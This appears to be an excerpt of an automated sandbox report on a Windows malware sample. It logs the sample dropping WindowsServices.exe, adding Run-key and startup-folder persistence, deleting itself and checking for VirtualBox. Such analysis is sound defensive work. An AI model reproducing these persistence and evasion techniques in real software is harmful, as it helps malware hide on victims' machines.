        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbsJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeFile created: C:\Users\user\AppData\Local\Temp\WindowsServices.exeJump to dropped file
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeFile created: C:\Users\user\Desktop\nOZ2Oqnzbz.exex (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exeJump to dropped file
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeFile created: C:\Users\user\Desktop\nOZ2Oqnzbz.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeFile created: C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)Jump to dropped file

        Boot Survival

        barindex
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exeJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbsJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbsJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46Jump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeFile deleted: c:\users\user\desktop\noz2oqnzbz.exeJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: 0_2_0040A440 IsIconic,6CF03130,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,6CF030D0,6CF016C0,6CF37140,73A24C40,6CEFE720,LPtoDP,73A24C00,6CF376C0,GetMapMode,6CF38460,DPtoLP,6CF387D0,GetWindowRect,6CEFE6C0,6CEFFEB0,73A24D40,6CF38160,6CF38160,6CF37850,6CF01660,6CF015D0,0_2_0040A440
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: VBoxS VBoxS 0_2_00405A10
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_0-1772
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeFile opened: C:\myapp.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeFile opened: C:\myapp.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeFile opened: C:\myapp.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeFile opened: C:\myapp.exe
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeMemory allocated: E10000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeMemory allocated: 2B70000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeMemory allocated: 4B70000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: F20000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2B80000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 4B80000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 67C0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 77C0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 7A20000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 8A20000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 8CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 9CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 9CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: ACD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: BCD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 8080000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: CCD0000 memory reserve | memory write watchJump to behavior
